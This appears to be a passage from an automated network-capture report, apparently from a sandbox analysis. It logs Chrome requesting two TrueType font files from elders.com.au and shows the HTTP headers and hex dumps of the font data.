                                                                                                                                                                                                            Data Ascii: 2V8O`1%8>[/7%#"'&547>32&#"327PmSO.'QkA55A[/$-mE72=d`|VJU6L'S?wq;b,U@+324'.+326@I+kad|0K,;/ILZQX]7*,6W<!vU)!#3#!v^_U#


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            86192.168.2.457756162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC722OUTGET /etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Bold.cebc7f85.ttf HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            Origin: https://elders.com.au
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: font
                                                                                                                                                                                                            Referer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.css
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC585INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:50 GMT
                                                                                                                                                                                                            Content-Type: font/ttf
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                            last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                            etag: W/"35a98-62599fcdf98c0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            Age: 30554
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210153-DFW
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1730285982.495027,VS0,VS0,VE1020
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b027eae02cbe-DFW
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC784INData Raw: 37 64 35 35 0d 0a 00 01 00 00 00 0f 00 80 00 03 00 70 46 46 54 4d 87 3e 07 4d 00 03 5a 7c 00 00 00 1c 47 44 45 46 00 25 00 00 00 02 2e 9c 00 00 00 18 47 50 4f 53 1a 53 4f cc 00 02 50 88 00 01 09 f2 47 53 55 42 7a e9 67 ad 00 02 2e b4 00 00 21 d4 4f 53 2f 32 8d 09 73 3c 00 00 01 78 00 00 00 60 63 6d 61 70 a1 46 2a 47 00 00 14 b0 00 00 05 6a 67 61 73 70 ff ff 00 03 00 02 2e 94 00 00 00 08 67 6c 79 66 54 84 e2 ba 00 00 23 8c 00 01 be 24 68 65 61 64 0f ec 4b 10 00 00 00 fc 00 00 00 36 68 68 65 61 07 c0 07 7e 00 00 01 34 00 00 00 24 68 6d 74 78 3a 34 b8 2f 00 00 01 d8 00 00 12 d8 6c 6f 63 61 80 e9 11 36 00 00 1a 1c 00 00 09 6e 6d 61 78 70 05 01 00 70 00 00 01 58 00 00 00 20 6e 61 6d 65 ba ac 19 93 00 01 e1 b0 00 00 20 7f 70 6f 73 74 9d 72 bf 80 00 02 02 30 00
                                                                                                                                                                                                            Data Ascii: 7d55pFFTM>MZ|GDEF%.GPOSSOPGSUBzg.!OS/2s<x`cmapF*Gjgasp.glyfT#$headK6hhea~4$hmtx:4/loca6nmaxppX name postr0
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 00 41 01 1c 00 3c 01 1b 00 0a 02 0f 00 42 01 23 00 44 03 23 00 38 02 2a 00 39 02 1f 00 28 02 32 00 43 02 31 00 2d 01 65 00 38 01 eb 00 1e 01 5f 00 18 02 22 00 46 01 da ff fb 02 c5 00 05 01 fe ff f6 01 fb 00 00 01 df 00 23 01 88 00 19 01 14 00 4b 01 88 00 19 02 32 00 32 00 e1 00 00 01 31 00 46 01 d1 00 2d 02 51 00 2d 01 bf 00 1f 02 38 ff f8 01 14 00 4b 02 56 00 2d 01 da 00 37 03 42 00 2d 01 b3 00 23 02 28 00 1e 02 13 00 2d 01 4a 00 2d 03 42 00 2d 01 6c 00 19 01 9b 00 23 02 01 00 2d 01 80 00 23 01 78 00 23 01 4f 00 23 02 22 00 46 02 5a 00 19 01 0c 00 2d 01 32 00 37 01 44 00 23 01 b3 00 23 02 28 00 1e 03 b2 00 23 03 b0 00 23 03 e6 00 23 01 e4 00 3c 02 50 ff fd 02 50 ff fd 02 50 ff fd 02 50 ff fd 02 50 ff fd 02 50 ff fd 03 5b ff f1 02 3e 00 2d 01 f9 00 4b 01
                                                                                                                                                                                                            Data Ascii: A<B#D#8*9(2C1-e8_"F#K221F-Q-8KV-7B-#(-J-B-l#-#x#O#"FZ-27D##(###<PPPPPP[>-K
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 47 02 1d 00 35 02 33 00 2d 02 50 00 4b 02 02 ff fb 02 1f 00 28 01 f6 00 2d 01 e3 00 32 02 2f 00 39 02 1f 00 2a 01 20 00 42 02 06 00 42 02 08 00 07 02 22 00 46 01 da ff fb 01 f2 00 2d 02 1f 00 28 02 2f 00 14 02 0f 00 28 01 d3 00 2d 02 2e 00 28 01 9f 00 09 02 1d 00 46 02 bb 00 28 01 fe ff f6 02 a9 00 3c 02 c5 00 28 01 20 ff dd 02 1d 00 4b 02 1f 00 28 02 1d 00 4b 02 c5 00 2d 02 50 00 3e 02 31 00 28 02 00 ff ec 02 00 ff 0f 02 00 ff ec 02 ae 00 28 01 f9 00 4b 01 f9 00 4b 02 bf 00 0f 01 bc 00 4b 02 3f 00 2d 02 52 00 23 01 28 00 4b 01 28 ff de 01 29 ff f1 03 9e ff fb 03 a6 00 4b 02 c1 00 0f 02 7f 00 4b 02 8a 00 4b 02 27 ff fb 02 69 00 4b 02 50 ff fd 02 66 00 4b 02 62 00 4b 01 bc 00 4b 02 94 00 05 01 f9 00 4b 03 ab 00 19 02 21 00 0f 02 8a 00 4b 02 8a 00 4b 02 7f
                                                                                                                                                                                                            Data Ascii: G53-PK(-2/9* BB"F-(/(-.(F(<( K(K-P>1((KKK?-R#(K()KKK'iKPfKbKKK!KK
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 02 1a 00 19 02 33 00 23 01 f4 00 23 02 3f 00 2d 01 fe 00 1e 02 5d 00 2d 02 36 00 28 01 d1 00 2d 02 51 00 2d 01 bf 00 1f 02 38 ff f8 02 7a 00 23 02 52 00 2e 01 f5 00 0f 02 40 ff ff 02 6e 00 31 02 3a 00 2f 02 3a 00 67 02 3a 00 34 02 3a 00 33 02 3a 00 26 02 3a 00 4b 02 3a 00 2a 02 3a 00 3d 02 3a 00 1b 02 3a 00 2c 02 6e 00 71 02 6e 00 2c 02 6e 00 7a 02 6e 00 13 02 3a 00 00 02 6e 00 18 02 6e 00 3b 02 3a 00 22 02 3a 00 09 03 8e 00 55 04 c5 00 55 02 d9 00 55 03 dd 00 28 02 0c ff fd 02 33 00 55 02 15 00 37 02 4b 00 55 01 e8 00 55 01 c7 00 55 02 64 00 37 02 51 00 55 01 37 00 55 01 37 00 05 02 3a 00 55 01 b7 00 55 03 07 00 41 02 51 00 55 02 81 00 37 02 15 00 55 02 81 00 37 02 2d 00 55 02 21 00 28 01 c6 00 0f 02 61 00 53 02 01 ff f1 02 ec 00 05 02 04 ff f6 01 e2 ff
                                                                                                                                                                                                            Data Ascii: 3##?-]-6(-Q-8z#R.@n1:/:g:4:3:&:K:*:=::,nqn,nzn:nn;:":UUU(3U7KUUUd7QU7U7:UUAQU7U7-U!(aS
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 55 00 23 04 bb 00 19 04 bb 00 97 04 bb 00 19 04 bb 00 97 04 bb 00 5f 04 bb 00 5f 04 bb 00 5f 04 bb 00 5f 02 00 ff 0f 02 00 ff ec 02 00 ff ec 02 50 00 3e 02 31 00 28 02 ae 00 28 02 00 ff ec 01 d4 ff f1 01 d4 ff f1 01 d4 ff f1 01 d4 ff f1 03 00 00 0d 02 83 00 69 02 83 00 69 04 14 00 0f 05 0d 00 0f 04 07 00 2d 04 14 00 2d 03 e4 00 2d 02 f8 00 2d 03 43 00 2d 01 d0 00 6f 00 01 ff f4 00 01 00 02 00 01 00 2c 00 01 fe 93 00 01 fe 5e 00 01 00 00 01 26 00 39 01 26 00 39 02 3e 00 77 02 6a 00 88 02 8a 00 a0 01 26 00 39 03 6c 00 1d 02 58 00 1d 03 78 00 1d 03 8c 00 1d 03 cf 00 1d 03 79 00 1d 02 4a 00 1d 02 56 00 1d 03 49 00 1d 02 8e 00 1d 03 58 00 1d 03 29 00 1d 04 14 00 1d 03 4a 00 1d 03 38 00 41 02 1f 00 62 02 1f 00 59 01 6c 00 19 02 1f 00 98 02 1f 00 5a 01 df 00 3d
                                                                                                                                                                                                            Data Ascii: U#____P>1((ii----C-o,^&9&9>wj&9lXxyJVIX)J8AbYlZ=
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 00 0e 00 0f 00 10 00 11 00 12 00 13 00 14 00 15 00 16 00 17 00 18 00 19 00 1a 00 1b 00 1c 00 1d 00 1e 00 1f 00 20 00 21 00 22 00 23 00 24 00 25 00 26 00 27 00 28 00 29 00 2a 00 2b 00 2c 00 2d 00 2e 00 2f 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 3a 00 3b 00 3c 00 3d 00 3e 00 3f 00 40 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 4f 00 50 00 51 00 52 00 53 00 54 00 55 00 56 00 57 00 58 00 59 00 5a 00 5b 00 5c 00 5d 00 5e 00 5f 00 60 00 61 00 62 00 00 00 87 00 88 00 8a 00 8c 00 94 00 99 00 9f 00 a4 00 a3 00 a5 00 a7 00 a6 00 a8 00 aa 00 ac 00 ab 00 ad 00 ae 00 b0 00 af 00 b1 00 b2 00 b4 00 b6 00 b5 00 b7 00 b9 00 b8 00 bd 00 bc 00 be 00 bf 02 67 00 73 00 65 00 66 00 6a 02 69 00 79 00 a2 00 71 00
                                                                                                                                                                                                            Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abgsefjiyq
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 64 56 8c 56 d6 56 ec 57 0e 57 38 57 7c 57 8c 57 b8 57 ce 58 5e 58 9e 58 be 58 f4 59 44 59 6e 59 9c 59 b2 59 ea 59 fc 5a 26 5a 54 5a 66 5a 9a 5a e4 5a fe 5b 16 5b 36 5b 4e 5b 6a 5b 94 5b c2 5b e8 5c 18 5c 50 5c 98 5c da 5d 26 5d 64 5d 74 5d 9e 5d ce 5e 56 5e a4 5e c2 5e fa 5f 44 5f 72 5f 9e 5f b4 5f e2 5f f4 60 2c 60 5a 60 6c 60 9a 60 e8 61 10 61 28 61 4a 61 64 61 82 61 aa 61 d6 61 fc 62 38 62 70 62 b4 62 ec 63 3a 63 78 63 8e 63 ca 64 06 64 1e 64 46 64 6c 64 b2 64 e2 65 14 65 66 65 8c 65 d2 65 ea 66 18 66 46 66 72 66 a6 66 ce 66 f2 67 04 67 14 67 2e 67 46 67 d4 68 5c 68 a8 68 f2 69 46 69 94 69 b0 69 ca 69 e6 6a 02 6a 24 6a 46 6a 66 6a 92 6a b8 6a de 6b 08 6b 2c 6b 4e 6b 7a 6b 86 6b 98 6b ca 6b fa 6c 22 6c 48 6c 74 6c a8 6c e4 6d 18 6d 52 6d 8c 6d c6 6e 00
                                                                                                                                                                                                            Data Ascii: dVVVWW8W|WWWX^XXXYDYnYYYYZ&ZTZfZZZ[[6[N[j[[[\\P\\]&]d]t]]^V^^^_D_r____`,`Z`l``aa(aJadaaaab8bpbbc:cxccdddFdlddeefeeeffFfrfffggg.gFgh\hhiFiiiijj$jFjfjjjkk,kNkzkkkkl"lHltllmmRmmn
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: d4 02 d4 30 d4 70 d4 b2 d4 e4 d5 32 d5 7c d5 c6 d5 d4 d5 f8 d6 06 d6 14 d6 26 d6 38 d6 52 d6 66 d6 8a d6 a6 d6 bc d6 d0 d7 24 d7 a0 d8 34 d8 a2 d9 02 d9 68 d9 e8 da 56 da 96 db 02 db 3a db 7e db c2 dc 1e dc 72 dc d4 dd 1c dd 54 dd ac dd fa de 08 de 2c de 3a de 48 de 5a de 6c de 86 de 9a de bc de d8 de ee de fc df 12 00 00 00 02 00 39 00 00 01 f1 02 b7 00 03 00 07 00 00 33 11 21 11 25 21 11 21 39 01 b8 fe 7a 01 54 fe ac 02 b7 fd 49 32 02 53 00 02 00 46 ff f3 00 eb 02 c6 00 03 00 0e 00 00 13 03 23 03 12 14 06 23 22 26 35 34 36 33 32 e7 1c 66 1e a4 31 23 22 2f 30 23 22 02 c6 fe 17 01 d2 fd b9 44 31 30 23 22 31 00 00 00 00 02 00 46 01 aa 01 ac 02 c4 00 03 00 07 00 00 01 23 11 33 03 23 11 33 01 ac 7e 7e e8 7e 7e 01 aa 01 1a fe e6 01 1a 00 00 02 00 23 00 00 02
                                                                                                                                                                                                            Data Ascii: 0p2|&8Rf$4hV:~rT,:HZl93!%!!9zTI2SF##"&54632f1#"/0#"D10#"1F#3#3~~~~#
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 78 94 91 79 78 94 91 7c 62 49 a7 62 49 00 00 00 01 00 1e 00 00 01 89 02 0a 00 0b 00 00 29 01 35 33 11 06 07 27 37 33 11 33 01 89 fe c3 6c 3d 3b 22 c1 5a 50 6d 01 03 26 14 48 8c fe 63 00 00 00 01 00 2d 00 00 01 ff 02 10 00 1d 00 00 25 07 21 35 3e 01 37 3e 01 35 34 26 23 22 07 27 36 33 32 16 15 14 07 0e 02 0f 01 36 33 01 ff 1d fe 5f 05 3f 23 63 4a 2c 24 3a 4e 50 6f 8d 59 6a 5e 10 30 3c 0d 1a 25 3c 70 70 7a 03 1d 14 38 4c 25 20 23 40 53 63 5a 4a 5c 46 0c 1d 21 08 0d 05 00 00 00 01 00 23 ff 48 01 f7 02 0b 00 29 00 00 25 14 06 23 22 2f 01 16 33 32 36 35 34 27 26 23 22 07 35 16 33 32 35 34 26 23 22 07 27 36 37 36 33 32 16 15 14 07 06 07 1e 01 01 f7 c5 9b 2d 26 20 24 28 68 82 2c 1d 40 25 0e 20 25 6f 2b 2a 51 43 46 2c 31 49 46 5e 7a 42 10 15 38 3f 32 67 83 05 5d
                                                                                                                                                                                                            Data Ascii: xyx|bIbI)53'733l=;"ZPm&Hc-%!5>7>54&#"'63263_?#cJ,$:NPoYj^0<%<ppz8L% #@ScZJ\F!#H)%#"/32654'&#"53254&#"'67632-& $(h,@% %o+*QCF,1IF^zB8?2g]
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 22 26 35 34 36 33 32 17 06 07 06 15 14 16 33 32 36 35 34 26 23 22 06 15 14 16 33 32 37 17 06 23 22 26 35 34 3e 01 33 32 16 05 26 23 22 06 15 14 33 32 36 37 03 58 85 5e 24 2f 16 08 02 43 53 3e 45 9a 82 41 4d 14 2b 08 14 18 2e 3c 99 7e 78 af 9d 78 4e 42 12 56 4c af dd 6a bf 75 aa e3 fe c8 0f 15 52 53 2a 22 4c 0c 01 14 81 a6 0f 1d 1b 15 50 4d 49 83 b8 29 43 ca 26 11 14 0f 7a 60 77 91 c7 8c 86 9b 16 55 1c cc b0 75 c4 74 c5 3d 07 91 5f 3f 45 38 00 00 00 02 ff fd 00 00 02 53 02 b9 00 07 00 11 00 00 21 23 27 23 07 23 13 33 03 26 2f 01 0e 02 07 06 07 02 53 96 31 cc 31 92 e4 97 0e 13 13 1c 01 0c 0f 05 14 11 a5 a5 02 b9 fe 60 39 53 7b 04 33 3b 14 4d 34 00 00 03 00 4b 00 00 02 35 02 b7 00 13 00 1f 00 2c 00 00 25 14 06 07 06 2b 01 11 33 32 16 17 16 15 14 07 06 07 1e
                                                                                                                                                                                                            Data Ascii: "&5463232654&#"327#"&54>32&#"3267X^$/CS>EAM+.<~xxNBVLjuRS*"LPMI)C&z`wUut=_?E8S!#'##3&/S11`9S{3;M4K5,%+32


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            87192.168.2.457758162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC724OUTGET /etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Normal.a1cecbde.ttf HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            Origin: https://elders.com.au
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: font
                                                                                                                                                                                                            Referer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.css
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC578INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:50 GMT
                                                                                                                                                                                                            Content-Type: font/ttf
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                            last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                            etag: W/"378b0-62599fcdf98c0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-sjc1000106-SJC
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1730264596.442895,VS0,VS0,VE882
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 3432
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b027ee752e1e-DFW
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC791INData Raw: 37 64 35 63 0d 0a 00 01 00 00 00 0f 00 80 00 03 00 70 46 46 54 4d 87 c9 4a b0 00 03 78 94 00 00 00 1c 47 44 45 46 2a 09 2e 08 00 02 36 f4 00 00 00 66 47 50 4f 53 09 82 40 e1 00 02 58 e0 00 01 1f b4 47 53 55 42 f2 d5 10 22 00 02 37 5c 00 00 21 82 4f 53 2f 32 8a 02 70 2a 00 00 01 78 00 00 00 60 63 6d 61 70 17 d9 cb 33 00 00 14 a8 00 00 05 1e 67 61 73 70 ff ff 00 03 00 02 36 ec 00 00 00 08 67 6c 79 66 b7 b9 bc 88 00 00 23 34 00 01 c7 6c 68 65 61 64 0f 61 50 9d 00 00 00 fc 00 00 00 36 68 68 65 61 07 36 08 b2 00 00 01 34 00 00 00 24 68 6d 74 78 ef 65 ce ea 00 00 01 d8 00 00 12 d0 6c 6f 63 61 83 5f 12 04 00 00 19 c8 00 00 09 6a 6d 61 78 70 05 04 00 a3 00 00 01 58 00 00 00 20 6e 61 6d 65 e0 36 6e 52 00 01 ea a0 00 00 20 01 70 6f 73 74 d9 49 30 6b 00 02 0a a4 00
                                                                                                                                                                                                            Data Ascii: 7d5cpFFTMJxGDEF*.6fGPOS@XGSUB"7\!OS/2p*x`cmap3gasp6glyf#4lheadaP6hhea64$hmtxeloca_jmaxpX name6nR postI0k
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 0e 00 14 02 02 00 52 01 0d 00 53 03 2c 00 4d 02 2c 00 4c 02 25 00 3c 02 39 00 54 02 39 00 41 01 44 00 4e 01 e1 00 37 01 40 00 1e 02 2d 00 5a 01 d9 00 0f 02 b7 00 14 01 d3 00 05 01 cb 00 0f 01 cb 00 2d 01 4b 00 2d 01 00 00 5f 01 4b 00 19 02 4e 00 41 00 e6 00 00 01 24 00 55 01 d5 00 41 02 33 00 37 01 c9 00 3a 02 1b 00 05 01 00 00 5f 02 24 00 41 01 a4 00 37 03 6a 00 41 01 ad 00 37 01 f8 00 41 01 f3 00 37 01 2d 00 37 03 6a 00 41 01 44 00 19 01 9c 00 2d 01 e1 00 37 01 66 00 2d 01 6b 00 2d 01 68 00 37 02 2e 00 5a 02 59 00 23 01 2d 00 55 01 22 00 37 01 45 00 2d 01 b0 00 37 01 f8 00 37 03 b6 00 2d 03 9d 00 2d 03 e1 00 2d 01 b6 00 37 02 47 00 0a 02 47 00 0a 02 47 00 0a 02 47 00 0a 02 47 00 0a 02 47 00 0a 03 75 00 05 02 3d 00 41 02 08 00 5f 02 08 00 5f 02 08 00 5f
                                                                                                                                                                                                            Data Ascii: RS,M,L%<9T9ADN7@-Z-K-_KNA$UA37:_$A7jA7A7-7jAD-7f-k-h7.ZY#-U"7E-77---7GGGGGGu=A___
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 00 41 02 35 00 5a 01 e6 00 00 02 25 00 3c 01 f9 00 3e 01 c0 00 41 02 2c 00 4c 02 30 00 46 01 06 00 4d 01 f4 00 52 01 ed 00 1d 02 2e 00 5a 01 d9 00 0f 01 e2 00 41 02 25 00 3c 02 26 00 2d 02 1b 00 46 01 c8 00 41 02 35 00 3c 01 95 00 14 02 20 00 56 02 ba 00 3b 01 d3 00 05 02 ab 00 52 02 b5 00 3c 01 06 00 02 02 20 00 56 02 25 00 3c 02 20 00 56 02 b5 00 3c 02 35 00 4b 02 15 00 3c 01 e1 ff fb 01 e1 ff 26 01 e1 ff fb 02 c0 00 4b 02 08 00 5f 02 08 00 5f 02 94 ff fb 01 a0 00 5f 02 4b 00 41 02 43 00 37 01 0e 00 5f 01 0e ff f2 01 17 00 03 03 7e 00 08 03 a1 00 5f 02 90 ff fb 02 5c 00 5f 02 9b 00 5f 01 df ff ef 02 6a 00 5f 02 47 00 0a 02 57 00 5f 02 61 00 5f 01 a0 00 5f 02 65 00 0a 02 08 00 5f 03 7a 00 20 02 23 00 1e 02 9b 00 5f 02 9b 00 5f 02 5c 00 5f 02 57 00 08 03
                                                                                                                                                                                                            Data Ascii: A5Z%<>A,L0FMR.ZA%<&-FA5< V;R< V%< V<5K<&K___KAC7_~_\__j_GW_a__e_z #__\_W
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 37 01 e7 00 2d 02 3f 00 41 02 04 00 2d 02 42 00 41 02 41 00 32 01 d5 00 41 02 33 00 37 01 c9 00 3a 02 1b 00 05 02 8d 00 37 02 43 00 1f 01 d0 00 19 02 24 00 0b 02 3a 00 4c 02 3a 00 3d 02 3a 00 7b 02 3a 00 4f 02 3a 00 4d 02 3a 00 39 02 3a 00 60 02 3a 00 3e 02 3a 00 43 02 3a 00 3d 02 3a 00 3a 02 3a 00 83 02 3a 00 59 02 3a 00 8e 02 3a 00 2e 02 3a 00 00 02 3a 00 27 02 3a 00 3b 02 3a 00 38 02 3a 00 0b 03 94 00 69 04 b7 00 69 02 bb 00 69 03 da 00 37 02 10 00 0f 02 44 00 69 02 02 00 46 02 52 00 69 01 f4 00 69 01 ca 00 69 02 5a 00 46 02 62 00 69 01 23 00 69 01 1d 00 0d 02 07 00 69 01 9e 00 69 02 ee 00 50 02 65 00 69 02 76 00 46 02 01 00 69 02 76 00 46 02 15 00 69 02 1b 00 37 01 c9 00 19 02 5e 00 64 01 df ff fb 02 b8 00 05 01 e0 00 05 01 cc ff fb 01 d6 00 2d 02 ee
                                                                                                                                                                                                            Data Ascii: 7-?A-BAA2A37:7C$:L:=:{:O:M:9:`:>:C:=::::Y::.::':;:8:iii7DiFRiiiZFbi#iiiPeivFivFi7^d-
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 03 68 00 94 03 68 00 19 03 68 00 94 03 68 00 4f 03 68 00 4f 03 68 00 4f 03 68 00 4f 01 e1 ff 26 01 e1 ff fb 01 e1 ff fb 02 35 00 4b 02 15 00 3c 02 c0 00 4b 01 e1 ff fb 01 cf 00 05 01 cf 00 05 01 cf 00 05 01 cf 00 05 02 a0 00 15 03 e5 00 19 04 f3 00 19 03 f8 00 41 03 f3 00 41 03 bd 00 41 02 c9 00 41 03 18 00 41 02 10 00 86 01 e5 00 61 00 01 fe 5e 00 01 fe 59 00 01 fe 89 00 01 fe 94 00 01 ff 82 01 22 00 4e 01 22 00 4e 02 30 00 7e 02 71 00 9b 02 9b 00 be 01 22 00 4e 03 54 00 2f 02 46 00 2f 03 4d 00 2f 03 5f 00 2f 03 85 00 2f 03 4f 00 2f 02 36 00 2f 02 40 00 2f 03 1a 00 2f 02 62 00 2f 03 57 00 2f 03 1c 00 2f 03 fa 00 2f 03 0e 00 2f 03 45 00 52 02 25 00 82 02 25 00 75 01 44 00 19 02 25 00 ae 02 25 00 69 01 cb 00 41 01 9b 00 2b 00 fc 00 41 02 11 00 ad 02 25 00
                                                                                                                                                                                                            Data Ascii: hhhhOhOhOhO&5K<KAAAAAa^Y"N"N0~q"NT/F/M/_//O/6/@//b/W////ER%%uD%%iA+A%
                                                                                                                                                                                                            2024-11-06 05:29:50 UTC1369INData Raw: 3b 00 3c 00 3d 00 3e 00 3f 00 40 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 4f 00 50 00 51 00 52 00 53 00 54 00 55 00 56 00 57 00 58 00 59 00 5a 00 5b 00 5c 00 5d 00 5e 00 5f 00 60 00 61 00 62 00 00 00 87 00 88 00 8a 00 8c 00 94 00 99 00 9f 00 a4 00 a3 00 a5 00 a7 00 a6 00 a8 00 aa 00 ac 00 ab 00 ad 00 ae 00 b0 00 af 00 b1 00 b2 00 b4 00 b6 00 b5 00 b7 00 b9 00 b8 00 bd 00 bc 00 be 00 bf 02 67 00 73 00 65 00 66 00 6a 02 69 00 79 00 a2 00 71 00 6c 02 87 00 77 00 6b 02 ac 00 89 00 9b 02 a9 00 74 02 ad 02 ae 00 68 00 78 02 a2 02 a5 02 a4 01 b3 02 aa 00 6d 00 7d 01 9c 00 a9 00 bb 00 82 00 64 00 6f 02 a8 01 44 02 ab 02 a3 00 6e 00 7e 02 6a 00 63 00 83 00 86 00 98 01 15 01 16 02 5e 02 5f 02 64 02 65 02 61 02 62 00 ba
                                                                                                                                                                                                            Data Ascii: ;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abgsefjiyqlwkthxm}doDn~jc^_deab
